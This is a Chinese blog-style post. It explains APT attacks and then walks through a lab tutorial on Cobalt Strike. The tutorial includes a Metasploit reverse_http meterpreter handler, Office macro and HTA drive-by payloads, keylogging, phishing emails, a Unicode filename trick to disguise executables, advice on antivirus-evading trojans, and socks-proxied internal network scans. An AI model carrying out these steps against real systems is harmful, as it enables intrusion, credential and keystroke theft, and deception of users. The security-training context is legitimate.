APT攻击

1.1 APT攻击简介

1.1.1APT攻击概念

        网络安全,尤其是Internet互联网安全正在面临前所未有的挑战,这主要就来自于有组织、有特定目标、持续时间极长的新型攻击和威胁,国际上有的称之为APT(Advanced Persistent Threat)攻击,或者称之为“针对特定目标的攻击”。

高级持续性威胁

        APT攻击的原理相对于其他攻击形式更为先进,其高级性主要体现在APT在发动攻击之前需要对攻击对象的业务流程和目标系统进行精确的收集。

        APT是黑客以窃取核心资料为目的,针对客户所发动的网络攻击和侵袭行为,是一种蓄谋已久的“恶意商业间谍威胁”。这种行为往往经过长期的经营与策划,并具备高度的隐蔽性。

        APT的攻击手法,在于隐匿自己,针对特定对象,长期、有计划性和组织性地窃取数据,这种发生在数字空间的偷窃资料、搜集情报的行为,就是一种“网络间谍”的行为。

       有些将APT定义为由民族或国家发起的攻击,有些则将APT描述为窃取一般数据或者知识产权信息的威胁。而准确地说,高级持续性威胁(Advanced Persistent Threat)是指组织(特别是政府)或者小团体使用先进的攻击手段对特定目标进行长期持续性网络攻击的攻击形式。本文中,我们将看看APT(高级持续性威胁)是如何演变的以及你需要如何抵御这种类型的威胁。

1.1.2APT攻击的威胁

目标性强

        不同于以往的常规病毒,APT制作者掌握高级漏洞发掘和超强的网络攻击技术。发起APT攻击所需的技术壁垒和资源壁垒,要远高于普通攻击行为。其针对的攻击目标也不是普通个人用户,而是拥有高价值敏感数据的高级用户,特别是可能影响到国家和地区政治、外交、金融稳定的高级别敏感数据持有者。

持续性

       攻击者为了重要的目标长时间持续攻击直到攻破为止。攻击成功用上一年到三年,攻击成功后持续潜伏五年到十年的案例都有。这种持续性攻击下,让攻击完全处于动态发展之中,而当前我们的防护体系都是强调静态对抗能力很少有防护者有动态对抗能力,因此防护者或许能挡住一时的攻击,但随时间的发展,系统不断有新的漏洞被发现,防御体系也会存在一定的空窗期:比如设备升级、应用需要的兼容性测试环境等等,最终导致系统的失守。

终端性

       攻击者虽然针对的是重要的资产目标,但是入手点却是终端为主。再重要的目标,也是由终端的人来访问的。而人在一个大型组织里,是难以保证所有人的安全能力与安全意识都处于一个很高水准之上的。而做好每个人的终端防护比服务器端防护要困难很多。通过SQL注射攻击了WEB服务器,一般也是希望利用他攻击使用这些WEB服务器的终端用户作为跳板渗透进内网。

广谱信息收集性

       攻击者会花上很长的时间和资源,依靠互联网搜集,主动扫描,甚至真实物理访问方式,收集被攻击目标的信息,主要包括:组织架构,人际关系,常用软件,常用防御策略与产品,内部网络部署等信息。

针对性

       攻击者会针对收集到的常用软件,常用防御策略与产品,内部网络部署等信息,搭建专门的环境,用于寻找有针对性安全漏洞,测试特定的木马是否能饶过检测。

未知性

        攻击者依据找到的针对性安全漏洞,特别是0DAY,根据应用本身构造专门的触发攻击的代码。并编写符合自己攻击目标,但能饶过现有防护者检测体系的特种木马。这些0DAY漏洞和特种木马,都是防护者或防护体系所不知道的。

渗透性社工

       攻击者为了让被攻击者目标更容易信任,往往会先从被攻击者目标容易信任的对象着手,比如攻击一个被攻击者目标的电脑小白好友或家人,或者被攻击者目标使用的内部论坛,通过他们的身份再对组织内的被攻击者目标发起0DAY攻击,成功率会高很多。再利用组织内的已被攻击成功的身份再去渗透攻击他的上级,逐步拿到对核心资产有访问权限的目标。

极强的隐蔽性

       对此可这样理解,APT攻击已经与被攻击对象的可信程序漏洞与业务系统漏洞进行了融合,在组织内部,这样的融合很难被发现。攻击者访问到重要资产后,往往通过控制的客户端,分布使用合法加密的数据通道,将信息窃取出来,以饶过我们的审计和异常检测的防护。,伪造了合法的数字证书,冒充正规软件实现了欺骗攻击。

长期潜伏与持续性控制

        攻击者长期控制重要目标获取的利益更大。一般都会长期潜伏下来,控制和窃取重要目标。当然也不排除在关键时候破坏型爆发。

        APT攻击是一种很有耐心的攻击形式,攻击和威胁可能在用户环境中存在一年以上,他们不断收集用户信息,直到收集到重要情报。他们往往不是为了在短时间内获利,而是把“被控主机”当成跳板,持续搜索,直到充分掌握目标对象的使用行为。所以这种攻击模式,本质上是一种“恶意商业间谍威胁”,因此具有很长的潜伏期和持续性。

1.2 ATP主要工具cs介绍

集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等功能。同时,Cobalt Strike还可以调用Mimikatz等其他知名工具,因此广受黑客喜爱。

一、启动,连接服务器

chmod   777  teamserver   (赋予权限)

APT攻击_第1张图片 启动服务端:(test 为待会靶机连接服务器的密码)
 ./teamserver 10.0.0.131 test
     APT攻击_第2张图片  客户端
 双击cs,bat   

APT攻击_第3张图片

 密码为test

APT攻击_第4张图片

 成功连接 

APT攻击_第5张图片

二、让主机上线

创建监听器
下面的add
      

APT攻击_第6张图片

生成木马

APT攻击_第7张图片

APT攻击_第8张图片

APT攻击_第9张图片

 保存到桌面
 可以找一个在线cs免杀马 将生成的放入windows2003

APT攻击_第10张图片

 双击可以检测到

三、结合metasploit,反弹shell(产生联动)
  

使用kail 打开msfconsole
添加一个(上面为IP下面为7777)

APT攻击_第11张图片

 use exploit/multi/handler


  set payload windows/meterpreter/reverse_http


  set lhost 10.0.0.131 


  set lport 7777


                   增加会话

APT攻击_第12张图片

APT攻击_第13张图片
                                        APT攻击_第14张图片
可以进行内网渗透任意攻击

四、office宏payload应用

APT攻击_第15张图片

APT攻击_第16张图片 

复制

APT攻击_第17张图片

APT攻击_第18张图片

创建删掉原有的复制

APT攻击_第19张图片
双击打开就会显示,可以控制对方电脑

五、图片编码

命名为图片gnp.exe
重命名在片和g之间右键unicode

APT攻击_第20张图片

APT攻击_第21张图片

变为这个样子


 六、Https Payload应用

优点:可能过行为查杀、另外administrator运行可直接提升为system权限
        APT攻击_第22张图片
创建服务
Sc create test binpath= ”c:\test.exe” start= auto displayname= ”test”

七、信息收集
    

APT攻击_第23张图片

APT攻击_第24张图片

APT攻击_第25张图片

在线短链接生成器

APT攻击_第26张图片

APT攻击_第27张图片

八、hta网页挂马

APT攻击_第28张图片

APT攻击_第29张图片

将文件保存到桌面

APT攻击_第30张图片

APT攻击_第31张图片

APT攻击_第32张图片

      进入目录查看已经存在
               APT攻击_第33张图片

APT攻击_第34张图片

APT攻击_第35张图片

APT攻击_第36张图片

打开win7,在百度内搜http://10.0.0.131:443/

APT攻击_第37张图片
会进行键盘记录 

     APT攻击_第38张图片 九、邮件钓鱼
    

先生成木马放入2003,双击查看到2003信息
        

APT攻击_第39张图片

APT攻击_第40张图片

APT攻击_第41张图片

在qq邮箱导出eml文件
  APT攻击_第42张图片          APT攻击_第43张图片        APT攻击_第44张图片
  弄一个钓鱼地址
        

APT攻击_第45张图片

APT攻击_第46张图片

APT攻击_第47张图片

APT攻击_第48张图片
            

APT攻击_第49张图片

APT攻击_第50张图片                                
十、Socks代理应用
    

设置代理端口

APT攻击_第51张图片

查看代理信息

APT攻击_第52张图片

APT攻击_第53张图片
复制信息

APT攻击_第54张图片

 利用msf进行攻击APT攻击_第55张图片
 粘贴进kail
         APT攻击_第56张图片                   
                            APT攻击_第57张图片    
                    APT攻击_第58张图片                APT攻击_第59张图片
                                        APT攻击_第60张图片
 还可以在配置文件vim /etc/proxychains.conf4 
在后面加127.0.0.1  端口为生成端口

APT攻击_第61张图片
使用代理扫描内网
 proxychains nmap -sP 172.16.0.0/24

十一、cs提权与内网渗透 

安装插件 
      

APT攻击_第62张图片

 

APT攻击_第63张图片

APT攻击_第64张图片

https://github.com/k8gege/Aggressor   安装神龙拉动介绍
https://github.com/k8gege/Ladon    神龙拉动下载
                                                        

你可能感兴趣的:(漏洞相关,网络,服务器,linux)